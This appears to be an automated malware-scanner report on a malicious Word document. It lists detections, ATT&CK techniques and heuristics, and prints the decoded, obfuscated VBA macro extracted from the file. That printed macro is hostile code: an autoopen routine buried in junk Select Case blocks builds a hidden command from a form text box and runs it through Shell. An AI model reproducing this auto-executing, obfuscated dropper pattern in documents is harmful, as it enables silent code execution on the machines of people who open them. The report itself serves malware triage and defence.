MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro triggers a function that includes a 'Shell()' call, indicating an attempt to execute external commands. This is further supported by the 'SC_STR_CMD' heuristic firing, suggesting 'cmd.exe' invocation. The ClamAV detection 'Doc.Downloader.Valyria-6786377-0' also points to a downloader functionality. The VBA script itself is heavily obfuscated, making it difficult to determine the exact payload or destination, but the intent is clearly to execute a secondary stage.
Heuristics 9
-
ClamAV: Doc.Downloader.Valyria-6786377-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6786377-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Set zAawFTZHtRvwSSfdmmCIn = LwWbRHlRUUNnEVW MGTzCD = Array(CSoRWlIz, KqcGTdYsl, dRKsVn, Interaction.Shell(qPOZizzNdMb, oilwju), LanpIm) Select Case DTpvpCYqVZJGtbRNPUikYJD -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() KvjmLN -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11472 bytes |
SHA-256: 81e6adddfa5deec0311a11749143be07f343c99a7533c2147c9bcb5eee7c31fc |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
322 of 358 identifiers look randomly generated (e.g. 'dmIFBbKPACcfzHHwcNpoSSro') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "XwWUkCvKdw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
KvjmLN
End Sub
Attribute VB_Name = "pVATiLJs"
Function KvjmLN()
On Error Resume Next
Select Case YpcNZAEQchnnZOoukcRDc
Case 59714889
zbSjUOfWfQBrub = iDkwWqprCtBRrTob
PpfmHUjCzLHXYXt = Log(WtNTfmKHjQmSwoCqp)
bFvbbjAtYihUdWHzUaaIZciY = 16379562
hRGJJRicvoWvRdSlNfZPmQK = TbPhVzbXYlCjnPVQlAaTcZJw
Case 275353725
OzwmEQGJphBBHvNzWjbiww = 62245508
ilprUuSSrhlbYlj = Log(ddaoPktiGdCcVHpQqpISa)
pvOiKZKlakzqFUXVu = 300764562
LkrrpzjsUljdOKOoiZjaUTU = Log(RdiCUsUuOaPiwE)
End Select
Set kahpArHljqjsvNTXrPo = MThXcQoOnukqaAvAmiU
Select Case cvLcpIcRuUPpOVZnAQ
Case 296878062
VWRiAcwZANwhwm = qbUPSoWUFBphGsmtuSiz
dhcNLDQjVitcsiL = Log(BaOzBMcKuqjNTEOOmWNu)
CHlFnjSwENJaOtrTAEQFRSU = 148580451
MRTfqWVRmwTctO = KOpdWmFKXulRwpbjmPC
Case 175011919
zQOqoJbuXrGqouCcq = 340059039
GHwkEEYcLPhNrnJLz = Log(nidiPzDfbIuYHvPlTLC)
JlQjPfqdPCijEADRncrw = 219980730
dPinHlzGTwIRSBRwPkJ = Log(QYdKTGrwzrTGwjIAwbX)
End Select
Set fIifbniCzrMHnHJ = mXTAtzIcfBSitRz
Select Case pCXfpsNHjzIMZjQ
Case 81885445
RjcYoZlVuHfwJhr = qTfWtFqBujrjbDXkqrBwzkB
lKulhLaPRTiNkqNMtbiI = Log(FtrjvGSjstGRCkiKFTiFc)
HVKzAdoFXGtujQDBm = 32956130
iYabwiFiBnHvCGp = WZvFornVzXIDSHDhdztqjt
Case 93261909
uznRQLroqdjcqzTql = 35541437
YaCMukaREMzGdLdLoEV = Log(ojTMoabqidCFbRp)
snshpunbrXDRNofmPAnrGpX = 127334481
kmaKuiMVmSALoPu = Log(sVQXKdqwQqbdwlDQZYFHMQz)
End Select
Set rvaViaaktwNTGvwGwcuEDiX = OklQKmjcYXjOCU
Select Case hdOcRLSfPrzVbksvZNPkIVIo
Case 72774986
wKUwbHRkvNsqSKC = jvjmBfsNsfwUqL
aRIOIKSPpEqoiCivEh = Log(oMHZHQSHEwJwtks)
ZKwurOfrhKqNLJktn = 239434876
ITsAzqDOTjHzElkJkH = OajQrzZEvuMPJJNkwjJwEo
Case 2575890
KZMmbaAzlAVwbDAD = 157543210
HTGQworBmcbJiaaTFRknc = Log(uNdJnRIufFaSjhGtbY)
anXYcRvVIwiTkIlYtnoAZss = 320933234
iPttNLqLsChXpArrvA = Log(zmqKvIMGmXVhvaCuCCcunsHr)
End Select
Set EBEmwIirwzisFwk = EDnXUmwmGppSGI
Const oilwju = 0
Select Case ERhCdRSiUDVwOhpzjFUPBJH
Case 169610740
XSiQowUzYnJmPSKbpvuXG = KikWsmRpvJHTGzoOjGBBquf
TmJnMOMCbiHzfRDh = Log(isAfwMLnbOoWFDQzZCGd)
djwErbsoiPCTVIBffXZw = 1082192
zYfWaqAGPzDBELDaElSzt = lCjvOUuijfdshXYVACoczEPT
Case 23434182
bETofBrAndnfbfLkRYYLif = 10511315
kQKRzjnPrYtqKrAcAjkvi = Log(aIQPnrvrLvCkEOqaBH)
XnDmUZZYvKwvFAPqCAjswT = 342167560
znZnlmafdFKhXVvp = Log(SAhNzzkpYoaROtDn)
End Select
Set phzmnJkSSAqhTjEtfdTSwz = pzNwzOPLGtjjOqbfqwvhwu
Select Case laMaQKiRYBrniviELjPJvwO
Case 15128343
avnHijwcNilZNitOjicAwicB = cpCuwoLJcpPrJuRsLVN
iwBWuLOlBAwSliBuwhPtZPk = Log(dWanLIlJPIvinfznaaIcsw)
bsWwiFUTOOLtYka = 176313865
PmDdmXHQhcSzHHwhQwuoMHE = ojQbmbCAzONGtcoVPfwdBTH
Case 39933447
LHmfmhHiHoGHfdFaS = 3780049
uqnnJZYjKbtVZKMaUPUMhFX = Log(oiNkCrCjTOLYYTcFNAwHO)
hzSClKznLpSBwaMoi = 131373518
KCKwnCAnPzjIPXWBPRz = Log(slfCVGWUBtZWcjD)
End Select
Set WwfzkWioijCicZwXi = fYXIchfflVZKjjTF
Select Case oMQunjRkqbDphiVhRQNW
Case 302472267
MdiTjQcnqCitVKik = waZiFjzwEScHHEviizmMUzAI
kBGnNKDjSPvUiH = Log(lWbwzjjznKqLrYdzaRcUfqJr)
YbopzOArpbzXCIW = 7152956
TcWzMHpQVCCmSu = kqaEuInwqTBzjbYJ
Case 40768554
bXjVHMTzYiMzEXjjnL = 218940320
GvjjjjKJJowtwTrXh = Log(jOkvkIksOiQwoMcoN)
qApbCKpjhSBljJCYbTjL = 73961734
wnSjsMAkQHGLjhZILaF = Log(aRrczHuPkJHCUS)
End Select
Set BIWRdjzCtfUdVw = HGFLzivpilSkzHzDqN
Select Case NTvQlLPuVNNqkNsL
Case 59025954
makmuOhhElTPdMJizuiahq = rOJSpDzMTpoVjbbYh
DGdaFkBhBPzciJvJtYkvs = Log(EZzZoqcHWVBrdkoQIZRH)
kOrGfZXiDnlqZB = 26400725
jvKFutcbqfLUcPLikbU = HTJQEYThQBDikoci
Case 47217835
IqmQPANCFncHFw = 215559657
TMltAVauKpbcknnjWhTiYrD = Log(DCSfFJvFBqVPsNC)
QrFaYkRSzvkYfCVbJcqwCu = 270124618
tWauSYoJijNjmc = Log(SkAjJZXZzVtFQWEjVCDhC)
End Select
Set XzaHatwoophsYNCO = cVwbYZTXmazrdiuhINBF
Select Case tNPwKTXRszLMlkkWpj
Case 320876281
BcPaBOYRooLCdHPzEW = MwOaJmapNdbckLqVQwovwuFc
mJidVnSSmjanBF = Log(aYLnNLarnmwzPbASrlWXds)
sqJJwbPiOsAUYjRP = 292404703
RvrWnCrmRiBfhKiM = zDBcPYDkGPGbiaWiL
Case 76274269
UWDHRLKjjjKplLQTLqjCXnlj = 253513286
KjIfAWzlrwuwkQFrWBvZV = Log(RGKnbJZhkWUhAbXBi)
qzUUZPGTzfQklMPuRCUNvq = 80596824
MYbCQiTUSHjVvzjv = Log(ILuRzkIRFJVhVtAnKHBoD)
End Select
Set TLvRddtzUVZfmi = sNnSlLUwnzNiilpiG
qPOZizzNdMb = XwWUkCvKdw.TextBox1 + koTBw + HXbMGiw + aKjEYYw + mKQAA + jPjFHibZ + dqVQrUv + zSKLZNV + FzEjq + RGFMkAj + Nhqjzuz + LLTfwDW
Select Case ttibUJmdonljsN
Case 337879738
rWPljwZCzEbnTvTiQLzCDf = PzYiQEEqDtzIdL
TuUcdPhwJtUCQhPwl = Log(TzlIQJwsNYuVnpXA)
CiaBniBOpwBoIowLvKLiLiL = 196252101
CIEoGifPpMOKKjRkubNzE = kzJrfMWjYWwQlZw
Case 173367238
RVYTbhAlittQDwjjzYGiO = 335210110
tIosOuurnTsvbflJQ = Log(FAScPVYQjoAqwUT)
iKnpmrjBFzKCFB = 75848456
qVIwARsSTzKGqzXXc = Log(AaVaWORQWSKVLhclzbL)
End Select
Set CNSUWpjcLIZnajAktP = ujjuaIzmciFzwMHVnIBEjioF
Select Case dIDJCGYdGOndwbiWBtX
Case 254625998
hQkkYWInlIaBNFVmfMiJZ = fDZfRLWroGStvsTYdjQpVFN
jWIjWhtdIpljLtEzRtU = Log(iUJdSGjusjWZqzvvCm)
HNpkGGnNjfTYclttPM = 206472376
PwwkYSMqOzIuiYMGt = DWftzOZLunwDjjXVFJOEM
Case 266483170
wwlWYtEYnAjJIlWwkLNXYtK = 117253007
XITDroWObiuNrARqPID = Log(aOkiKiszQWCoTwBklVvLJujC)
ksLvjJkHSwJYksNvXzF = 210832776
ttzjFtNrqjhiGam = Log(DjNRjBzrMAciQmwbWVqwM)
End Select
Set bPXQbRbpdSbOUNsOZ = tHTERibDjGMljnVoIztQZiP
Select Case VwtMjtChMzTkTrsKbJorL
Case 75191034
zztziraijMPEkmBdNG = budKboCbAdAZVKcvOmvYpmT
YEmIYajakSjbTnSJcQZAjn = Log(uHqmqSiDpbqmXBuCZzZoCaB)
bUlvZMTGkKrBinqICPu = 340216747
AvIiOzDGwrUFOLWjmicI = BNJsUlHRmnfCwaYdNLMPA
Case 251561706
XwTcTbPlSrtziwptNw = 271516442
EpDPkzDYSPsjPumw = Log(JnpWBMKFbqiYRz)
LZOhtDsVXqSDzKjoMs = 296274455
IzqCcsKJGZABQY = Log(pfEDwQRRfiJLurCSfYu)
End Select
Set LjMFAtjOwqRmamtI = pwnriKTTjPREGVd
Select Case TCVQpfdfqzDPwbTUPzZJFvom
Case 71775005
VvHLszJfAIrLCfojBic = obobWNoKpXNiFOJiX
HGGRaKcDztUZtKJtmuGj = Log(iIwpduJFnVGJXWVLWAiwTQ)
pQdDZMcPcqpdwHczPTzJYOP = 146090256
oiQtbhVOOIYzqjtLFdShtX = uDPfVGVbAHQkiM
Case 144536651
ITPjwDwYjEzSkz = 265109345
QiVqMCAHshXrawPzjdJOinE = Log(EqvQICqDTXUzqfoGTHrQjGw)
pwjHoaPdZilVGjwprUYDi = 101565185
EoCvWvnKwsLbKTj = Log(tHqaLtTAjJBZLiuGZ)
End Select
Set fSlfthmUncvIoWIFfvnpzK = CMMtOzPwFCVoQcOOJo
Select Case TStviWQWiMOUCwZcmSoj
Case 240787653
TlhoZbbLfDooOZjVw = lkVRjQoPXQajwit
wINtwpuXhKjNkz = Log(QTjzzvCBRAJDLlwFFvLaaIE)
vqwjYkafYWJMSktG = 320058097
wtnljljFaSYYTIO = BJzSdjZdioblnUBEiU
Case 78585372
YKGMATJIHzDBzzij = 61144326
dPUJHvKzRGRTuwwDwrDl = Log(JXRWikZoplRvAqwqO)
LCDBDrnFEFuBqj = 159752430
UrDncKkJcUzYtIzM = Log(oriPHUZiZfUtnulXpWEna)
End Select
Set ARuZirPLwFhTBppwMXd = CfQPoZNBEmuZHO
Select Case MPlqVQpzdEFHYDEIFzKR
Case 207338704
OliZzcQbMuuhwsbzdHljHrfi = wzLbUIuzPBzHwRNhBs
MrFMjHUDfzpXGABB = Log(EArlzkirbpjpYwGzTVfs)
fUAFOzadtGuPidBAZMHWUF = 116757811
NHAiXmfVIsZjrflmHNhjma = VFwuIYVRZCMsHzsGHbYHqD
Case 138650130
tbUPHXiBnSfdZrWz = 253370844
zdindpPHaHNSzRkpAhE = Log(JBTLFoSOjPFbVOE)
fGzfzzzboUSNtkqosjRzJSh = 269958117
AaKClzkNsJujZGKEsX = Log(WEVwYQipzGhMYIHzZmYCX)
End Select
Set zAawFTZHtRvwSSfdmmCIn = LwWbRHlRUUNnEVW
MGTzCD = Array(CSoRWlIz, KqcGTdYsl, dRKsVn, Interaction.Shell(qPOZizzNdMb, oilwju), LanpIm)
Select Case DTpvpCYqVZJGtbRNPUikYJD
Case 114530357
dcrDIqEoHzPLjYARwDwptDP = oBWbiWuQYDLZhnNjER
bCCfviTZGGbzZNWOGTdKk = Log(znjNakLqNkbSnSm)
azKzoKwDlMLYGPbHAW = 18317151
wiDjOPsqXHZDcjsfz = RpqcbOYmjwJURRPXXsubiY
Case 117824801
jimIwWWvHMENYVG = 266902481
bjthDpHnELAlYEsX = Log(wzbQqMbNNFMCzClFRGsYX)
pfUrKWJiHMqnZJMtlTRU = 276237860
ukEJPjGzAzNTIwwwCFDiz = Log(MMcbsXVZGDnEkj)
End Select
Set BHdbJLqaFBQzmRMQLmtYsj = njcbsJjDLMLAwaCnpVmXZb
Select Case cNtBBTMKqBBajJim
Case 61441752
YTHMzqTOPhKolSODchWlO = FjQLqdCFUKjOaIB
QDinDfzBPiMdhzQXT = Log(NbvlApLJMAFXsGBMRT)
bCajPvHRZYXuMu = 47548956
aUiCsbuTzvsqGbUjwTsQnvj = sYlloFtclLarnQKzHGjTCRL
Case 329547982
rzsBqHfonKUpJi = 300573279
PFuBdsjItIjOMn = Log(MnhzIAbuEvDzFqJwcnR)
MQwawQjIhaRcziHCbjlBoK = 278667076
atbSjKEauAPwqHw = Log(RSNddbzWiHXvCPwBarAFpRZ)
End Select
Set WqhzTLLTiskWzMcwtE = bmIYiCNWzHtCztqHntADX
Select Case tVrEwhkqYTuwzJa
Case 315138231
lURATCDVwhbGIYShBL = NnCivsVwEbLzKKMjz
EaToiCAIkQucRwwHhjjq = Log(IzFwukiRwwsUEwkwZF)
dmIFBbKPACcfzHHwcNpoSSro = 131253524
HNANIIbjMjzsDW = UhPTQvNwzIkjRhLuUlATz
Case 100501160
tUENuXzkKSEzlcUDGuQAFX = 160591779
BBofGDDmFtVzMhSZ = Log(XaQMkZSAitZjOi)
vuMtiRiGPRrrGUrYbr = 329574405
zHwRbWfYJdFqLADRVZqkt = Log(BvshLfrVzpQAYowuRL)
End Select
Set FwmLAjGQaDCANocGBYuLAh = fQaKcPTaHiwnYPjrAEORRv
Select Case GFXVzbWpHrjzSTmI
Case 259586288
GdknQzuUNkkJjiEw = zflLmpTmcSYmRisiVYHZSoY
dNlFzHztTamcCzUnRBo = Log(WivCrfOKzZaLHKhYDNoUU)
SrwPbWETIQAqEvRjNRtn = 315582847
zbUsRvkDMTNrPEGbEsFdRJL = FmGUAXbjjYsUujEIj
Case 32147731
jdMfNclNAhSdpQ = 26907206
fpPDpsjIrLljUnzuMFinsG = Log(rOJawQvCEqwZTTBNnwEoBrE)
NkYQjlQuYwYojRirwJjpYNi = 174234507
rrqoRqAKRNNsiSTa = Log(AWvNhVOMssKOUz)
End Select
Set zGrtaFGFXdOEUzS = NPVMHiwKVcbZwpvzOHvXaZz
Select Case ORInRiaMKpBUnLrq
Case 197334600
iuAIkWVDXzTkXKqDmmifPO = YFhiFimorsPGjKFjmRNH
taRrdkZEHwZPPcDCnPUl = Log(crHEHtjGwNCHCffP)
cwNjjtqqUiCiwBsWTQiKnWr = 295117414
LlXIMwXmwnVXZtzRNmKibzLJ = jOzFDGHUkXIThImfrBOWw
Case 298056509
ltZjjOXOaNXchahthO = 22998073
VpwjiYzkvzmmqrLMiWaFNJ = Log(FJfEEKIjIuDBwvtEIPmSd)
lmqOUOKnzbMHsWzTuZn = 106966854
rmpPRkSSqaqEiYsOqptW = Log(zcpoCWEoUNfNzuAAwD)
End Select
Set sVHBVCOwGFEktuJuKAbP = NdVNLrhisOrmPdzpb
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.